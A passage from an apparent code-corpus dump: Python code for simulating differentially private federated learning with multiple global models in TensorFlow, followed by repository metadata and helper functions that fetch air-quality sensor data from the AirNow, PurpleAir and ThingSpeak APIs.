from compute_dp_sgd_privacy_lib import compute_dp_sgd_privacy
from compute_noise_from_budget_lib import compute_noise
# model_num
# MODEL_NUM=9
lock=threading.Lock() # guards the shared counter below across client worker threads
# Number of client training threads that have finished their local pass;
# incremented at the end of Single_user_train.
finished_thread_Count=0
def Single_user_train(sess, assignments, set_global_step, model, participating_clients, clients_epoch,
                      increase_global_step, FLAGS, data_placeholder, label_placeholder, data_set_asarray,
                      label_set_asarray, s, c, train_op, real_round, acc):
    """Run one client's local training pass and publish a perturbed model.

    A random global model slot is loaded into the TF graph, trained for
    ``FLAGS.e`` epochs on client ``c``'s data, perturbed via the Gaussian
    mechanism (``WeightsAccountant``) and written back into another randomly
    chosen model slot. Intended to run inside a ThreadPoolExecutor worker.

    :param sess: TF session to run training in.
    :param assignments: ops that load a model's weights into the graph.
    :param set_global_step: op that restores the model's global step.
    :param model: mutable list of per-slot model dicts (feed_dicts); slot
        ``replaceModel`` is overwritten as a side effect.
    :param participating_clients: per-client arrays of training-sample indices.
    :param clients_epoch: per-slot, per-client accumulated epoch counts;
        mutated as a side effect.
    :param increase_global_step: op that increments and returns the step.
    :param FLAGS: configuration (MODEL_NUM, b, e, method, THV, ...).
    :param data_placeholder, label_placeholder: graph input placeholders.
    :param data_set_asarray, label_set_asarray: full data/label arrays.
    :param s: mapping from client position ``c`` to its clients_epoch index.
    :param c: index of the client to train.
    :param train_op: training op.
    :param real_round: current communication round (for the accountant).
    :param acc: privacy accountant passed through to the Gaussian update.
    :return: None; results are published through ``model`` and the module
        counter ``finished_thread_Count``.
    """
    with sess.as_default():
        with sess.graph.as_default():
            # Start from a random model slot; publish into another random slot.
            choose_model = random.randrange(FLAGS.MODEL_NUM)
            replaceModel = random.randrange(FLAGS.MODEL_NUM)
            # Split this client's sample indices into FLAGS.b batches.
            data_ind = np.split(np.asarray(participating_clients[c]), FLAGS.b, 0)
            # The target slot inherits the source slot's epoch count plus the
            # FLAGS.e epochs trained here (drives the noise calibration below).
            clients_epoch[replaceModel][s[c]] = clients_epoch[choose_model][s[c]] + FLAGS.e
            if FLAGS.method == 0:
                # Closed-form Gaussian noise multiplier; the log(1e3) term
                # presumably bakes in a 1e-3 delta — TODO confirm against the
                # compute_noise-based calibration this replaced.
                target_sigma = 1.5 / FLAGS.b * ((clients_epoch[replaceModel][s[c]] * FLAGS.b * math.log(1e3)) ** 0.5) / FLAGS.THV
            else:
                target_sigma = 0
            # Load the chosen slot's weights (and its global step) into the graph.
            sess.run(assignments + [set_global_step], feed_dict=model[choose_model])
            # Local training: FLAGS.e epochs over all batches.
            for e in range(int(FLAGS.e)):
                for step in range(len(data_ind)):
                    real_step = sess.run(increase_global_step)
                    batch_ind = data_ind[step]
                    feed_dict = {str(data_placeholder.name): data_set_asarray[[int(j) for j in batch_ind]],
                                 str(label_placeholder.name): label_set_asarray[[int(j) for j in batch_ind]]}
                    _ = sess.run([train_op], feed_dict=feed_dict)
            # Perturb the trained weights via the Gaussian mechanism and
            # publish them into the replacement slot.
            weights_accountant = WeightsAccountant(sess, model[choose_model], target_sigma, real_round,
                                                   participating_clients[c].shape[0] * FLAGS.e)
            newModel = weights_accountant.Update_via_GaussianMechanism(sess, acc, FLAGS, [])
            model[replaceModel] = newModel
            # `real_step` is the step reached in the last training iteration;
            # assumes FLAGS.e >= 1 and a non-empty batch split.
            model[replaceModel]['global_step_placeholder:0'] = real_step
            # Fix: this counter is mutated concurrently by ThreadPoolExecutor
            # workers, so the increment must hold the module lock (the original
            # left the lock acquisition commented out — a data race).
            global finished_thread_Count
            with lock:
                finished_thread_Count += 1
            return
def run_differentially_private_federated_averaging(loss, train_op, eval_correct, data, data_placeholder,
                                                   label_placeholder, privacy_agent=None, b=10, e=4,
                                                   record_privacy=True, m=0, sigma=0, eps=8, save_dir=None,
                                                   log_dir=None, max_comm_rounds=3000, gm=True,
                                                   saver_func=create_save_dir, save_params=False, MODEL_NUM=10,
                                                   THV=1, C=0.01, method=0, isTest=False):
    """
    This function will simulate a federated learning setting and enable differential privacy tracking. It will detect
    all trainable tensorflow variables in the tensorflow graph and simulate a decentralized learning process where these
    variables are learned through clients that only have access to their own data set.
    This function must therefore be run inside a Graph as follows:
    --------------------------------------------------------------------------------------------------------------------
    with tf.Graph().as_default():
        train_op, eval_correct, loss, data_placeholder, labels_placeholder = Some_function_that_builds_TF_graph()
        Accuracy_accountant, Delta_accountant, model = \
            run_differentially_private_federated_averaging(loss, train_op, eval_correct, DATA, data_placeholder,
                                                           labels_placeholder)
    --------------------------------------------------------------------------------------------------------------------
    The graph that train_op, loss and eval_op belong to should have a global_step variable.
    :param loss: TENSORFLOW node that computes the current loss
    :param train_op: TENSORFLOW Training_op
    :param eval_correct: TENSORFLOW node that evaluates the number of correct predictions
    :param data: A class instance with attributes:
                 .data_set : The training data stored in a list or numpy array.
                 .label_set : The training labels stored in a list or numpy array.
                              The indices should correspond to .data_set. This means a single index
                              corresponds to a data(x)-label(y) pair used for training:
                              (x_i, y_i) = (data.data_set(i),data.label_set(i))
                 .client_set : A nested list or numpy array. len(data.client_set) is the total
                               number of clients. for any j, data.client_set[j] is a list (or array)
                               holding indices. these indices specify the data points that client j
                               holds.
                               i.e. if i is in data.client_set[j], then client j owns (x_i, y_i)
                 .vali_data_set : The validation data stored in a list or numpy array.
                 .vali_label_set : The validation labels stored in a list or numpy array.
    :param data_placeholder: The placeholder from the tensorflow graph that is used to feed the model with data
    :param label_placeholder: The placeholder from the tensorflow graph that is used to feed the model with labels
    :param privacy_agent: A class instance that has callabels .get_m(r) .get_Sigma(r) .get_bound(), where r is the
                          communication round.
    :param b: Batchsize
    :param e: Epochs to run on each client
    :param record_privacy: Whether to record the privacy or not
    :param m: If specified, a privacyAgent is not used, instead the parameter is kept constant
    :param sigma: If specified, a privacyAgent is not used, instead the parameter is kept constant
    :param eps: The epsilon for epsilon-delta privacy
    :param save_dir: Directory to store the process
    :param log_dir: Directory to store the graph
    :param max_comm_rounds: The maximum number of allowed communication rounds
    :param gm: Whether to use a Gaussian Mechanism or not.
    :param saver_func: A function that specifies where and how to save progress: Note that the usual tensorflow
                       tracking will not work
    :param save_params: save all weights_throughout training.
    :param MODEL_NUM: number of global models kept on the server (K in the K-model scheme).
    :param THV: threshold value used in the closed-form noise-scale computation (method 0).
    :param C: clipping constant kept in FLAGS for the weights accountant.
    :param method: training variant: 0 = K-model scheme with DP noise,
                   1 = K-model scheme without noise, 2 = plain federated averaging.
    :param isTest: if True, per-round per-model accuracy/statistics are appended to model_diff.txt.
    :return:
    """
    # If no privacy agent was specified, the default privacy agent is used.
    if not privacy_agent:
        # Run-name suffix per training variant. The Chinese strings are run
        # identifiers persisted on disk and are kept verbatim.
        # NOTE(review): `nstr` is unbound for method values outside {0,1,2}.
        if method==0:
            nstr="完善版本算法模型diff"
        elif method==1:
            nstr="完善版无噪声"
        elif method==2:
            nstr="完善版联邦平均"
        privacy_agent = PrivAgent(len(data.client_set), 'K_'+str(MODEL_NUM)+'_'+nstr)
    # A Flags instance is created that will fuse all specified parameters and default those that are not specified.
    FLAGS = Flag(len(data.client_set), b, e, record_privacy, m, sigma, eps, save_dir, log_dir, max_comm_rounds, gm,
                 privacy_agent, MODEL_NUM, THV, C, method)
    # Check whether the specified parameters make sense.
    FLAGS = check_validaity_of_FLAGS(FLAGS)
    # At this point, FLAGS.save_dir specifies both; where we save progress and where we assume the data is stored
    save_dir = saver_func(FLAGS)
    # This function will retrieve the variable associated to the global step and create nodes that serve to
    # increase and reset it to a certain value.
    increase_global_step, set_global_step = global_step_creator()
    # - model_placeholder : a dictionary in which there is a placeholder stored for every trainable variable defined
    #                       in the tensorflow graph. Each placeholder corresponds to one trainable variable and has
    #                       the same shape and dtype as that variable. in addition, the placeholder has the same
    #                       name as the Variable, but a '_placeholder:0' added to it. The keys of the dictionary
    #                       correspond to the name of the respective placeholder
    model_placeholder = dict(zip([Vname_to_FeedPname(var) for var in tf.trainable_variables()],
                                 [tf.placeholder(name=Vname_to_Pname(var),
                                                 shape=var.shape,
                                                 dtype=tf.float32)
                                  for var in tf.trainable_variables()]))
    # - assignments : Is a list of nodes. when run, all trainable variables are set to the value specified through
    #                 the placeholders in 'model_placeholder'.
    assignments = [tf.assign(var, model_placeholder[Vname_to_FeedPname(var)]) for var in
                   tf.trainable_variables()]
    # load_from_directory_or_initialize checks whether there is a model at 'save_dir' corresponding to the one we
    # are building. If so, training is resumed, if not, it returns:   - model = []
    #                                                                 - accuracy_accountant = []
    #                                                                 - delta_accountant = []
    #                                                                 - real_round = 0
    # And initializes a Differential_Privacy_Accountant as acc
    # model, accuracy_accountant, delta_accountant, acc, real_round, FLAGS, computed_deltas = \
    #     load_from_directory_or_initialize(save_dir, FLAGS)
    model, accuracy_accountant, clients_epoch,timeList, acc, real_round, FLAGS = \
        load_from_directory_or_initialize_K_model(save_dir, FLAGS)
    m = int(FLAGS.m)
    sigma = float(FLAGS.sigma)
    # - m : amount of clients participating in a round
    # - sigma : variable for the Gaussian Mechanism.
    # Both will only be used if no Privacy_Agent is deployed.
    ################################################################################################################
    # Test Part
    # if isTest==True:
    #     assert (model is not None)
    #     sess = tf.Session()
    #
    #     if method == 0 or method == 1:
    #         # 1.0/2.0 each test round evaluates the average of all K models
    #         average_model = copy.deepcopy(model[0])
    #         for k in model[0].keys():
    #             for i in range(1, FLAGS.MODEL_NUM):
    #                 average_model[k] = average_model[k] + model[i][k]
    #             average_model[k] = average_model[k] / FLAGS.MODEL_NUM
    #
    #         # Setting the trainable Variables in the graph to the values stored in feed_dict 'model'
    #         sess.run(assignments, feed_dict=average_model)
    #     else:
    #         sess.run(assignments, feed_dict=model)
    #
    #     feed_dict = {str(data_placeholder.name): np.asarray(data.x_vali),
    #                  str(label_placeholder.name): np.asarray(data.y_vali)}
    #
    #     # compute the loss on the validation set.
    #     global_loss = sess.run(loss, feed_dict=feed_dict)
    #     count = sess.run(eval_correct, feed_dict=feed_dict)
    #     accuracy = float(count) / float(len(data.y_vali))
    #     accuracy_accountant.append(accuracy)
    #
    #     print("平均模型准确率")
    #     print_loss_and_accuracy(global_loss, accuracy)
    #
    #     for i in range(FLAGS.MODEL_NUM):
    #         sess.run(assignments, feed_dict=model[i])
    #         feed_dict = {str(data_placeholder.name): np.asarray(data.x_vali),
    #                      str(label_placeholder.name): np.asarray(data.y_vali)}
    #
    #         # compute the loss on the validation set.
    #         global_loss = sess.run(loss, feed_dict=feed_dict)
    #         count = sess.run(eval_correct, feed_dict=feed_dict)
    #         accuracy = float(count) / float(len(data.y_vali))
    #         accuracy_accountant.append(accuracy)
    #
    #         print("第"+str(i)+"个模型准确率")
    #         print_loss_and_accuracy(global_loss, accuracy)
    #     return
    ################################################################################################################
    # Usual Tensorflow...
    init = tf.global_variables_initializer()
    sess = tf.Session()
    sess.run(init)
    ################################################################################################################
    # If there was no loadable model, we initialize a model:
    # - model : dictionary having as keys the names of the placeholders associated to each variable. It will serve
    #           as a feed_dict to assign values to the placeholders which are used to set the variables to
    #           specific values.
    if not model:
        # 0.0 initialize the K sets of model parameters before training starts
        if method==2:
            # Plain federated averaging keeps a single global model.
            model=dict(zip([Vname_to_FeedPname(var) for var in tf.trainable_variables()],
                           [sess.run(var) for var in tf.trainable_variables()]))
            model['global_step_placeholder:0'] = 0
        else:
            # K-model variants: snapshot K independently re-initialized models.
            for i in range(FLAGS.MODEL_NUM):
                model.append(dict(zip([Vname_to_FeedPname(var) for var in tf.trainable_variables()],
                                      [sess.run(var) for var in tf.trainable_variables()])))
                model[i]['global_step_placeholder:0'] = 0
                # Re-run the initializer so the next snapshot draws fresh random weights.
                sess.run(init)
        # end 0.0
        # original: single-model version
        # model = dict(zip([Vname_to_FeedPname(var) for var in tf.trainable_variables()],
        #                  [sess.run(var) for var in tf.trainable_variables()]))
        # model['global_step_placeholder:0'] = 0
        # original
        real_round = 0
        weights_accountant = []
    # If a model is loaded, and we are not relearning it (relearning means that we once already finished such a model
    # and we are learning it again to average the outcomes), we have to get the privacy accountant up to date. This
    # means, that we have to iterate the privacy accountant over all the m, sigmas that correspond to already completed
    # communication
    if not FLAGS.relearn and real_round > 0:
        bring_Accountant_up_to_date(acc, sess, real_round, privacy_agent, FLAGS)
    ################################################################################################################
    # This is where the actual communication rounds start:
    data_set_asarray = np.asarray(data.sorted_x_train)
    label_set_asarray = np.asarray(data.sorted_y_train)
    time_start = time.time()
    # NOTE(review): the number of communication rounds is hard-coded to 18;
    # FLAGS.max_comm_rounds is ignored here.
    for r in range(18):
        # First, we check whether we are loading a model, if so, we have to skip the first allocation, as it took place
        # already.
        # 1.0 choose one model per round, non-IID data, noise-free gradient updates
        # choose one model
        # choose_model = random.randrange(MODEL_NUM)
        # end 1.0
        # compute result
        # need use average model
        # but dont care
        if not (FLAGS.loaded and r == 0):
            if method==0 or method==1 :
                # 1.0/2.0 each test round evaluates the average of all K models
                average_model = copy.deepcopy(model[0])
                for k in model[0].keys():
                    for i in range(1, FLAGS.MODEL_NUM):
                        average_model[k] = average_model[k] + model[i][k]
                    average_model[k]=average_model[k] / FLAGS.MODEL_NUM
                # Setting the trainable Variables in the graph to the values stored in feed_dict 'model'
                sess.run(assignments, feed_dict=average_model)
            else:
                sess.run(assignments, feed_dict=model)
            # end 1.0
            # original: single-model version
            #sess.run(assignments, feed_dict=model)
            # end original
            # create a feed-dict holding the validation set.
            feed_dict = {str(data_placeholder.name): np.asarray(data.x_vali),
                         str(label_placeholder.name): np.asarray(data.y_vali)}
            # compute the loss on the validation set.
            global_loss = sess.run(loss, feed_dict=feed_dict)
            count = sess.run(eval_correct, feed_dict=feed_dict)
            accuracy = float(count) / float(len(data.y_vali))
            accuracy_accountant.append(accuracy)
            timeList.append(int(time.time()-time_start))
            print_loss_and_accuracy(global_loss, accuracy)
            save_progress_K_model(save_dir, model, accuracy_accountant, privacy_agent, clients_epoch,timeList, FLAGS)
            if isTest==True:
                # Append per-round diagnostics (accuracy, loss, weight mean/variance)
                # for the average model and for each of the K models.
                with open(save_dir+"/model_diff.txt", 'a+') as f:
                    f.write("round"+str(real_round)+":\n")
                    f.write(str(accuracy)+" "+str(global_loss))
                    for k in model[0].keys():
                        mu_Test = np.mean(average_model[k])
                        sigma_Test = np.var(average_model[k])
                        f.write(" "+str(mu_Test)+" "+str(sigma_Test))
                    f.write("\n")
                    for i in range(FLAGS.MODEL_NUM):
                        sess.run(assignments, feed_dict=model[i])
                        feed_dict = {str(data_placeholder.name): np.asarray(data.x_vali),
                                     str(label_placeholder.name): np.asarray(data.y_vali)}
                        # compute the loss on the validation set.
                        global_loss = sess.run(loss, feed_dict=feed_dict)
                        count = sess.run(eval_correct, feed_dict=feed_dict)
                        accuracy = float(count) / float(len(data.y_vali))
                        accuracy_accountant.append(accuracy)
                        f.write(str(accuracy) + " " + str(global_loss) + " ")
                        for k in model[0].keys():
                            mu_Test = np.mean(model[i][k])
                            sigma_Test = np.var(model[i][k])
                            f.write(" " + str(mu_Test) + " " + str(sigma_Test))
                        f.write("\n")
        # original: compute the privacy bound and stop automatically
        # if delta_accountant[-1] > privacy_agent.get_bound() or math.isnan(delta_accountant[-1]):
        #     print('************** The last step exhausted the privacy budget **************')
        #     if not math.isnan(delta_accountant[-1]):
        #         try:
        #             None
        #         finally:
        #             save_progress(save_dir, model, delta_accountant + [float('nan')],
        #                           accuracy_accountant + [float('nan')], privacy_agent, FLAGS)
        #         return accuracy_accountant, delta_accountant, model
        #     else:
        #         try:
        #             None
        #         finally:
        # end original
        #save_progress(save_dir, model, delta_accountant, accuracy_accountant, privacy_agent, FLAGS)
        ############################################################################################################
        # Start of a new communication round
        real_round = real_round + 1
        print_new_comm_round(real_round)
        if FLAGS.priv_agent:
            m = int(privacy_agent.get_m(int(real_round)))
            sigma = privacy_agent.get_Sigma(int(real_round))
        print('Clients participating: ' + str(m))
        # Randomly choose a total of m (out of n) client-indices that participate in this round
        # randomly permute a range-list of length n: [1,2,3...n] --> [5,2,7..3]
        # perm = np.random.permutation(FLAGS.n)
        # NOTE(review): random permutation is disabled — client selection is
        # deterministic (always the first m clients).
        perm = np.arange(FLAGS.n)
        # Use the first m entries of the permuted list to decide which clients (and their sets) will participate in
        # this round. participating_clients is therefore a nested list of length m. participating_clients[i] should be
        # a list of integers that specify which data points are held by client i. Note that this nested list is a
        # mapping only. the actual data is stored in data.data_set.
        s = perm[0:m].tolist()
        participating_clients = [data.client_set[k] for k in s]
        if method==0:
            # NOTE(review): hard-coded sample truncation (first 5 clients keep 225
            # samples, clients 5..99 keep 475) — assumes m >= 100; confirm.
            for c in range(5):
                participating_clients[c]=participating_clients[c][:225]
            for c in range(5,100):
                participating_clients[c]=participating_clients[c][:475]
        global finished_thread_Count
        finished_thread_Count=0
        # For each client c (out of the m chosen ones):
        if method == 2:
            # Plain federated averaging: every client trains from the single global
            # model; updates are accumulated and averaged once per round.
            for c in range(m):
                sess.run(assignments + [set_global_step], feed_dict=model)
                data_ind = np.split(np.asarray(participating_clients[c]), FLAGS.b, 0)
                for e in range(int(FLAGS.e)):
                    for step in range(len(data_ind)):
                        real_step = sess.run(increase_global_step)
                        batch_ind = data_ind[step]
                        feed_dict = {str(data_placeholder.name): data_set_asarray[[int(j) for j in batch_ind]],
                                     str(label_placeholder.name): label_set_asarray[[int(j) for j in batch_ind]]}
                        _ = sess.run([train_op], feed_dict=feed_dict)
                if c == 0:
                    weights_accountant = WeightsAccountant(sess, model, sigma, real_round, participating_clients[c].shape[0] * FLAGS.e)
                else:
                    weights_accountant.allocate(sess)
            model = weights_accountant.Update_via_GaussianMechanism(sess, acc, FLAGS, [])
            model['global_step_placeholder:0'] = real_step
            # 2.0 each client chooses one model, non-IID data, noise-free gradient updates
            # choose one model
            # choose_model = random.randrange(FLAGS.MODEL_NUM)
            # Assign the global model and set the global step. This is obsolete when the first client trains,
            # but as soon as the next client trains, all progress allocated before, has to be discarded and the
            # trainable variables reset to the values specified in 'model'
            # sess.run(assignments + [set_global_step], feed_dict=model[choose_model])
            # end 1.0
            # original: single-model version
            #sess.run(assignments + [set_global_step], feed_dict=model)
            # end original
            # allocate a list, holding data indices associated to client c and split into batches.
            # data_ind = np.split(np.asarray(participating_clients[c]), FLAGS.b, 0)
            # 2.0 each client chooses one model, both noisy and noise-free variants
            # replaceModel = random.randrange(FLAGS.MODEL_NUM)
            # clients_epoch[replaceModel][s[c]] = clients_epoch[choose_model][s[c]] + FLAGS.e
            # target_sigma = compute_noise(participating_clients[c].shape[0],
            #                              participating_clients[c].shape[0] / FLAGS.b, 1,
            #                              clients_epoch[replaceModel][s[c]], 1e-3, 1e-6)
            #
            # sess.run(assignments + [set_global_step], feed_dict=model[choose_model])
            # #end 2.0
            #
            # # e = Epoch
            # for e in range(int(FLAGS.e)):
            #     for step in range(len(data_ind)):
            #         # increase the global_step count (it's used for the learning rate.)
            #         real_step = sess.run(increase_global_step)
            #         # batch_ind holds the indices of the current batch
            #         batch_ind = data_ind[step]
            #
            #         # Fill a feed dictionary with the actual set of data and labels using the data and labels associated
            #         # to the indices stored in batch_ind:
            #
            #         # 1.0
            #         # for j in batch_ind:
            #         #     feed_dict = {str(data_placeholder.name): data_set_asarray[[int(j)]],
            #         #                  str(label_placeholder.name): label_set_asarray[[int(j)]]}
            #         #     sess.run(assignments + [set_global_step], feed_dict=model[choose_model])
            #         #     _ = sess.run([train_op], feed_dict=feed_dict)
            #         #     if j == batch_ind[0]:
            #         #         # If we just trained the first client in a comm_round, We override the old weights_accountant (or,
            #         #         # if this was the first comm_round, we allocate a new one. The Weights_accountant keeps track of
            #         #         # all client updates throughout a communication round.
            #         #         weights_accountant = WeightsAccountant(sess, model[choose_model], target_sigma, real_round,
            #         #                                                participating_clients[c].shape[0])
            #         #     else:
            #         #         # Allocate the client update, if this is not the first client in a communication round
            #         #         weights_accountant.allocate(sess)
            #         #
            #         # newModel = weights_accountant.Update_via_GaussianMechanism(sess, acc, FLAGS, [])
            #         # model[replaceModel] = newModel
            #         # model[replaceModel]['global_step_placeholder:0'] = real_step
            #         # end 1.0
            #         # original
            #         feed_dict = {str(data_placeholder.name): data_set_asarray[[int(j) for j in batch_ind]],
            #                      str(label_placeholder.name): label_set_asarray[[int(j) for j in batch_ind]]}
            #         # Run one optimization step.
            #         _ = sess.run([train_op], feed_dict=feed_dict)
            #         # end original
            #
            #         # original/1.0 choose one model per round, non-IID data, noise-free gradient updates
            #         # if c == 0:
            #         #
            #         #     # If we just trained the first client in a comm_round, We override the old weights_accountant (or,
            #         #     # if this was the first comm_round, we allocate a new one. The Weights_accountant keeps track of
            #         #     # all client updates throughout a communication round.
            #         #     weights_accountant = WeightsAccountant(sess, model[choose_model], sigma, real_round)
            #         # else:
            #         #     # Allocate the client update, if this is not the first client in a communication round
            #         #     weights_accountant.allocate(sess)
            #         # end 1.0
            #
            #         # 2.0 each client chooses one model, both noisy and noise-free variants
            #         # if step==0 and e==0:
            #         #     weights_accountant = WeightsAccountant(sess, model[choose_model], target_sigma, real_round, participating_clients[c].shape[0])
            #         # else:
            #         #     weights_accountant.allocate(sess)
            # # newModel = weights_accountant.Update_via_GaussianMechanism(sess, acc, FLAGS, computed_deltas)
            #
            # weights_accountant = WeightsAccountant(sess, model[choose_model], target_sigma, real_round,
            #                                        participating_clients[c].shape[0]*FLAGS.e)
            # newModel = weights_accountant.Update_via_GaussianMechanism(sess, acc, FLAGS, [])
            #
            # model[replaceModel] = newModel
            # # original
            # # delta_accountant.append(delta)
            # # end original
            # # if c==0:
            # #     target_sigma = compute_noise(participating_clients[c].shape[0], participating_clients[c].shape[0]/FLAGS.b, 1, clients_epoch[replaceModel][s[c]], 1e-3, 1e-6)
            # # eps, _ = compute_dp_sgd_privacy(participating_clients[c].shape[0], participating_clients[c].shape[0]/FLAGS.b, sigma, clients_epoch[s[c]], 1e-3)
            # model[replaceModel]['global_step_placeholder:0'] = real_step
            # end 2.0
            # newModel = Single_user_train(sess, assignments, set_global_step, model, participating_clients,
            #                              clients_epoch,
            #                              choose_model, replaceModel,
            #                              data_ind, increase_global_step, FLAGS, data_placeholder, label_placeholder,
            #                              data_set_asarray, label_set_asarray,
            #                              s, c, train_op, real_round, acc)
            # End of a communication round
            ############################################################################################################
        elif method==0:
            # K-model DP variant: each client trains sequentially via Single_user_train,
            # which mutates `model` in place.
            for c in range(m):
                Single_user_train(sess, assignments, set_global_step, model, participating_clients, clients_epoch,
                                  increase_global_step, FLAGS, data_placeholder, label_placeholder, data_set_asarray,label_set_asarray,
                                  s, c, train_op, real_round, acc)
            # for c in range(m):
            #     threading.Thread(target=Single_user_train, args=(sess, assignments, set_global_step, model, participating_clients, clients_epoch,
            #                       increase_global_step, FLAGS, data_placeholder, label_placeholder, data_set_asarray,label_set_asarray,
            #                       s, c, train_op, real_round, acc)).start()
            #     Single_user_train(sess, assignments, set_global_step, model, participating_clients, clients_epoch,
            #                       increase_global_step, FLAGS, data_placeholder, label_placeholder, data_set_asarray,label_set_asarray,
            #                       s, c, train_op, real_round, acc)
            #     task = pool.submit(Single_user_train, sess, assignments, set_global_step, model, participating_clients, clients_epoch,
            #                        increase_global_step, FLAGS, data_placeholder, label_placeholder, data_set_asarray,
            #                        label_set_asarray, s, c, train_op, real_round, acc)
            #     model = task.result()
            # while finished_thread_Count!=m:
            #     pass
        else:
            # Noise-free K-model variant: identical control flow (Single_user_train
            # sets target_sigma to 0 when FLAGS.method != 0).
            for c in range(m):
                Single_user_train(sess, assignments, set_global_step, model, participating_clients, clients_epoch,
                                  increase_global_step, FLAGS, data_placeholder, label_placeholder, data_set_asarray,label_set_asarray,
                                  s, c, train_op, real_round, acc)
        print('......Communication round %s completed' % str(real_round))
        # Compute a new model according to the updates and the Gaussian mechanism specifications from FLAGS
        # Also, if computed_deltas is an empty list, compute delta; the probability of Epsilon-Differential Privacy
        # being broken by allocating the model. If computed_deltas is passed, instead of computing delta, the
        # pre-computed vaue is used.
        # original: choose one model per training round
        #model, delta = weights_accountant.Update_via_GaussianMechanism(sess, acc, FLAGS, computed_deltas)
        #end original
        # 1.0 choose one model per training round
        #replace model
        #newModel, delta = weights_accountant.Update_via_GaussianMechanism(sess, acc, FLAGS, computed_deltas)
        #replaceModel = random.randrange(MODEL_NUM)
        #model[replaceModel] = newModel
        # append delta to a list.
        # delta_accountant.append(delta)
        # Set the global_step to the current step of the last client, such that the next clients can feed it into
        # the learning rate.
        #model[replaceModel]['global_step_placeholder:0'] = real_step
        # PRINT the progress and stage of affairs.
        #print(' - Epsilon-Delta Privacy:' + str([FLAGS.eps, delta]))
        # end 1.0
        if save_params:
            weights_accountant.save_params(save_dir)
    time_end = time.time()
    with open(save_dir+'/time.txt', 'w') as f:
        f.write(str(time_end-time_start)) # write elapsed seconds to file
    return [], [], []
| 55.937397 | 185 | 0.556459 |
f04513d8a52e2b2f005e1b339084909e7473832b | 3,930 | py | Python | src/data.py | BlueViper8907/Air-Quality | 5947c08bc96cf00e8efa609c1470c2de1c86ae86 | [
"MIT"
] | 2 | 2021-09-02T17:03:13.000Z | 2021-09-08T14:59:38.000Z | src/data.py | BlueViper8907/Air-Quality | 5947c08bc96cf00e8efa609c1470c2de1c86ae86 | [
"MIT"
] | 34 | 2021-06-24T00:32:03.000Z | 2022-03-21T21:58:18.000Z | src/data.py | BlueViper8907/Air-Quality | 5947c08bc96cf00e8efa609c1470c2de1c86ae86 | [
"MIT"
] | 3 | 2021-09-14T02:48:16.000Z | 2021-11-18T01:06:46.000Z | from datetime import datetime
from datetime import timedelta
import pandas as pd
import requests
def pull_airnow_sensor_data(
    api_key: str,
    start_date: str,
    end_date: str,
    measures: list=['OZONE','PM25','CO'],
    bbox: list=[-87.912584,41.587576,-87.522570,42.109292]
):
    '''
    Pulls all AirNow sensor data within the defined bounding box between
    the start and end dates defined.

    PARAMETERS
    ===
    api_key: str, personal AirNow API key
    start_date: str, defines the beginning of desired AirNow data.
                Format: Year-Month-Day, 2021-06-21
    end_date: str, defines the end of desired AirNow data.
                Format: Year-Month-Day, 2021-06-21
    measures: list-like, an iterable list of desired measures to pull
                from AirNow. Defaults are Ozone, PM 2.5, and Carbon Monoxide
    bbox: list-like, an iterable list of floats defining the bounding
                box from which to grab AirNow data.

    OUTPUT
    ===
    sensor_data: pandas dataframe, contains all relevant AirNow data
    '''
    # The default lists are never mutated, so sharing them across calls is safe.
    # Join measures into a comma-separated string for the API call. Using
    # str.join also fixes the previous element-comparison approach, which
    # dropped the separator after any element equal to the last one
    # (e.g. duplicated measure names).
    PARAMS = ','.join(measures)
    # Join the bounding-box coordinates the same way.
    BBOX_x = ','.join(str(coord) for coord in bbox)
    # Build the AirNow "data" endpoint query; T02/T03 pin the hour-of-day window.
    query = (
        f"https://www.airnowapi.org/aq/data/?startDate={start_date}T02&endDate={end_date}"
        f"T03&parameters={PARAMS}&BBOX={BBOX_x}&dataType=B&format=text/csv"
        f"&verbose=0&nowcastonly=0&includerawconcentrations=0&API_KEY={api_key}"
    )
    # The endpoint returns headerless CSV; read it straight into a dataframe.
    sensor_data = pd.read_csv(
        query,
        names=['Latitude','Longitude','DateTime','Parameter','Concentration','Unit','AQI','Category']
    )
    return sensor_data
def pull_purpleair_data(
    sensors: pd.DataFrame,
    city: str,
    neighborhood: str,
    key: str
) -> pd.DataFrame:
    '''
    Get neighborhood-specific sensor data from PurpleAir.

    Filters `sensors` down to the rows matching `city` and `neighborhood`,
    queries the PurpleAir JSON API for those sensor ids, and returns the
    API "results" payload as a dataframe.
    '''
    # Select the sensor ids for this city/neighborhood and pipe-join them
    # into the format the PurpleAir API expects.
    in_neighborhood = (sensors.City == city) & (sensors.Neighborhood == neighborhood)
    sensor_ids = sensors[in_neighborhood].SensorID.astype(str).tolist()
    sensor_list = "|".join(sensor_ids)
    pa_query = f'https://www.purpleair.com/json?key={key}&show={sensor_list}'
    # Fetch and unpack the JSON response.
    json_data = requests.get(pa_query).json()
    return pd.DataFrame(json_data['results'])
def pull_purpleair_historical(
    weeks_to_get: int,
    channel: str,
    key: str,
    col_names: dict,
    start_date: datetime = None,
) -> pd.DataFrame:
    """
    Get data from the ThingSpeak API one week at a time up to weeks_to_get
    weeks in the past.

    :param weeks_to_get: number of one-week windows to fetch (values < 1 fetch one week)
    :param channel: ThingSpeak channel id
    :param key: ThingSpeak read API key for the channel
    :param col_names: mapping of raw feed column names to friendly names
    :param start_date: most recent end of the window; defaults to "now" at call
                       time (a None sentinel avoids the evaluated-at-import-time
                       default-argument pitfall of `datetime.now()`)
    :return: concatenated weekly feeds, indexed by entry_id, with a `channel` column
    """
    if start_date is None:
        start_date = datetime.now()

    # Fetch each one-week window, walking backwards from start_date.
    # Fix: the old version fetched one week and then looped `weeks_to_get`
    # MORE times, returning weeks_to_get + 1 weeks of data.
    frames = []
    for _ in range(max(weeks_to_get, 1)):
        to_week = start_date - timedelta(weeks=1)
        url = (
            f'https://thingspeak.com/channels/{channel}/feed.csv?api_key={key}'
            f'&offset=0&average=&round=2'
            f'&start={to_week.strftime("%Y-%m-%d")}%2000:00:00'
            f'&end={start_date.strftime("%Y-%m-%d")}%2000:00:00'
        )
        frames.append(pd.read_csv(url))
        start_date = to_week
    weekly_data = pd.concat(frames)

    # Rename the raw feed columns and normalize the timestamp column.
    weekly_data.rename(columns=col_names, inplace=True)
    weekly_data['created_at'] = pd.to_datetime(
        weekly_data['created_at'], format='%Y-%m-%d %H:%M:%S %Z')
    weekly_data.index = weekly_data.pop('entry_id')
    weekly_data['channel'] = channel
    return weekly_data
0e1f09bd16318c053c60d0edbbf752aca28f4f22 | 152 | py | Python | About/admin.py | Django-Development/marketing-your-own-service-on-django | 7bd4f20c1c0cd7319b546f1e09fda7c1403ec89c | [
"MIT"
